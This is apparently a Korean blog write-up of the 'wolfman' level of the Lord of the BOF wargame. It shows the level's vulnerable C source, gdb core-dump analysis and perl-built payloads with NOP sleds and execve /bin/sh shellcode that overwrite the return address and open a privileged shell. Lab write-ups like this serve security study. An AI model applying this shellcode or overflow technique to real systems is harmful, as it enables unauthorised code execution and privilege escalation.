/*1. Bash2 실행*/
[orc@localhost orc]$ bash2
/*2. 소스를 봅시다*/
[orc@localhost orc]$ cat wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40); //버퍼가 40바이트인데 40바이트를 모두 40으로 채워버립니다
}
/*여기서, 버퍼는 사용할 수 없다는 것을 알게됩니다. 그래서 대충 페이로드를 짜서 넣어봅니다.*/
[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
???????????????????????????????????????????????퓧???????????????j
X?Rh//shh/bin??S?訴
Segmentation fault (core dumped) //코더덤프☆를 주니까 까봅시다.
/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'*/
[orc@localhost orc]$ gdb -q wolvman core
Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j
X?R'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbf909090 in ?? ()
(gdb) x/50wx $esp
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x99580b6a 0x2f2f6852 0x2f686873 0x896e6962
0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14 0x08048390
0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc13 0xbffffc1d 0x00000000
0xbffffb20: 0xbffffc75 0xbffffc83 0xbffffc9a 0xbffffcb9
0xbffffb30: 0xbffffcdb 0xbffffce4 0xbffffea7 0xbffffec6
0xbffffb40: 0xbffffedf 0xbffffef4 0xbfffff0f 0xbfffff1a
0xbffffb50: 0xbfffff32 0xbfffff3e 0xbfffff46 0xbfffff50
0xbffffb60: 0xbfffff60 0xbfffff6e 0xbfffff7c 0xbfffff8d
0xbffffb70: 0xbfffff98 0xbfffffa7 0xbfffffe6 0x00000000
0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffb90: 0x00000005 0x00000006
(gdb)
0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8
0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8
0xbffffbd8: 0x00000010 0x0febfbff 0x0000000f 0xbffffc0e
0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f
0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090
0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090
0xbffffc58: 0x90909090 0x580b6a90
(gdb) quit
/*제가 이 문제를 풀었을때는 쉘코드가 0xbffffc37지점에 있었는데 말이죠..;;.......
암튼 공격해봤습니다.*/
[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'`
????????????????????????????????????????????7?퓧???????????????j
X?Rh//shh/bin??S?訴?????????????????????
bash$ exit //잘되네여
exit
[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'`
????????????????????????????????????????????7?퓧???????????????j
X?Rh//shh/bin??S?訴?????????????????????
bash$ my-pass
euid = 505 //땋
이번엔.. 쉽게풀었네요ㅋㅋ
'STUDY > Lord of the BOF' 카테고리의 다른 글
| darkelf->orge (0) | 2013.11.22 |
|---|---|
| wolfman->darkelf (0) | 2013.11.21 |
| goblin->orc (0) | 2013.11.20 |
| cobolt->goblin (0) | 2013.11.01 |
| gremlin->cobolt (0) | 2013.10.30 |